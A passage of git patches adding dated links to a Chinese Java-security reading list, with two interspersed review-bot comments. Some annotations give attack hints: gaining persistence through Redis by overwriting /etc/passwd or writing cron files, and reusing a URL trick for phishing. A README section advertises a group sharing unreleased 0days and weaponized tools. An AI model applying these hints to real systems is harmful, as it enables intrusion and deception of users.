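Review bot: The annotation on the added 2023/01/17 CodeQLpy line, "可以尝试用vi跑一下", writes the tool as lowercase "vi", which reads as the text editor, while the 2023/01/09 CodeQLpy entry in this same file writes what is apparently the same tool as "VI". Use one spelling in both entries and say once what the tool is, so the note is usable by someone other than the author.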
From cc0aabe127367c713599492f11724ee386d0a750 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 21:24:24 +0800 Subject: [PATCH 256/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ff05aa6..d65ef33 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -252,3 +252,4 @@ + 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) + 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** ++ 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** From ac0e8d7063b6359c970cb4ac945aaaf57a662d0c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 21:48:25 +0800 Subject: [PATCH 257/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d65ef33..e6b61d1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -253,3 +253,4 @@ + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) + 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** + 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** ++ 2023/1/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** From ec1cb285491fd139f59d213a37d4345441ac661e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 18 Jan 2023 11:20:02 +0800 Subject: [PATCH 258/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e6b61d1..9768ff0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -253,4 +253,5 @@ + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) + 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** + 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** -+ 2023/1/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** ++ 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** ++ 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 1fc5c76155b9aeb97473377980dc3a810f1a34c4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 19 Jan 2023 11:49:29 +0800 Subject: [PATCH 259/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9768ff0..4d61315 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -255,3 +255,4 @@ + 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** + 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** + 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** From 94b68f51ef75f2973710e5f90577f552895ee95c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 19 Jan 2023 21:30:16 +0800 Subject: [PATCH 260/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4d61315..db647b6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -256,3 +256,4 @@ + 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** + 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** ++ 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** From b3272af2213f62639a2bca057439f7f19d2969ee Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 19 Jan 2023 23:23:54 +0800 Subject: [PATCH 261/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index db647b6..c0dda1a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -257,3 +257,4 @@ + 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** + 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** ++ 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** From d3a20de2adfd2da8f2b9b9bec716fd7d01134ab2 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 23 Jan 2023 19:52:29 +0800 Subject: [PATCH 262/332] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index e2e39f6..907e11b 100644 --- a/README.md +++ b/README.md @@ -26,6 +26,12 @@ + 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚 +## 知识星球 +该知识星球主要是分享java相关的安全知识,绝对精华.里面包含未开放的1day和0day等分享或武器化工具一发入魂 + +![image](https://user-images.githubusercontent.com/63966847/214033050-87bdd0f8-4982-4aac-b79d-a5b6d0f107b9.png) + + ## 代学习 From 44384ae543ee83a3e6304345b972046f895d49c8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 29 Jan 2023 15:12:19 +0800 Subject: [PATCH 263/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c0dda1a..9f83a8d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -258,3 +258,4 @@ + 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** + 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** + 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** ++ 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** From 4b605c634c1a23f2164c158a98e9f19dda10e911 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 29 Jan 2023 21:18:09 +0800 Subject: [PATCH 264/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9f83a8d..2f83594 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -259,3 +259,4 @@ + 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** + 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** + 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** ++ 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** From 0437e1595880648d415a00c62d4d5ca3080316c7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 29 Jan 2023 22:49:25 +0800 Subject: [PATCH 265/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2f83594..458b7e4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -260,3 +260,4 @@ + 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** + 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** ++ 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** From d4f3e447859646d735c8f861ea6ab9da39f693d3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 30 Jan 2023 15:23:12 +0800 Subject: [PATCH 266/332] Update Readme.md --- shell/OGNL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index b09dfcf..9b83e7d 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -41,6 +41,9 @@ String bypass_sm_exp = "var str = Java.type('java.lang.String[]').class;" + >参考 >https://www.sec-in.com/article/753 >https://www.mi1k7ea.com/2020/03/16/OGNL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/ +## Bypass + +https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/ ## mybatis 存在${}的ognl 参考2022的d3ctf ezsql From 9ca0f18f5e4982381bb8801c282bb8bf83182282 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 30 Jan 2023 15:54:59 +0800 Subject: [PATCH 267/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 458b7e4..6f2dab2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -261,3 +261,4 @@ + 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** ++ 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) From 0de7647bb752430b676cb3463695a02e22a25709 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 1 Feb 2023 12:04:32 +0800 Subject: [PATCH 268/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6f2dab2..97cb930 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -262,3 +262,4 @@ + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** + 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) ++ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) 
From 34024c8050995e60f0eb8d54ac8ef14e5b783284 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 1 Feb 2023 19:14:22 +0800 Subject: [PATCH 269/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 97cb930..bbe8fa6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -262,4 +262,5 @@ + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** + 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) -+ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) ++ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) ++ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) **可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** From 98d47619c28482ef86504e731e4eff8f8c45bc48 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Feb 2023 20:28:03 +0800 Subject: [PATCH 270/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bbe8fa6..20d2377 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -263,4 +263,5 @@ + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** + 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) + 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) -+ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) **可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** ++ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** ++ 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) From 8f2c86d4f92990975fbce31449874276bad6310c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 3 Feb 2023 23:34:23 +0800 Subject: [PATCH 271/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 20d2377..cd55399 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -265,3 +265,4 @@ + 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) + 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** + 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) ++ 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** From 01f655987e69a8c767deb43102ad63c3cca9e5bf Mon Sep 17 00:00:00 2001 
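Review bot: In the hunk of PATCH 270/332 above, the added 2023/02/02 line links to https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8, which is this list's own directory and not the article named in the link text; point it at the article's URL. The same hunk changes the Redis annotation from "**可写" to "** 可写", but a space directly inside either `**` marker stops Markdown from rendering the span as bold, and the bare `*` at the end of /var/spool/cron/* and /etc/cron.d/* adds further stray delimiters; drop the inner spaces and put the three paths in backticks.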
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 6 Feb 2023 18:20:00 +0800 Subject: [PATCH 272/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cd55399..1274f69 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -266,3 +266,4 @@ + 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** + 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) + 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** ++ 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** From d66d38939f448a4f316f06cea4756d3455bdc018 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Feb 2023 21:31:54 +0800 Subject: [PATCH 273/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1274f69..bc75483 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -267,3 +267,4 @@ + 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) + 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** + 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** ++ 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** From 62a7791c550314a2750df8d2f7e61dc7df9d4b61 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 10 Feb 2023 13:06:15 +0800 Subject: [PATCH 274/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" 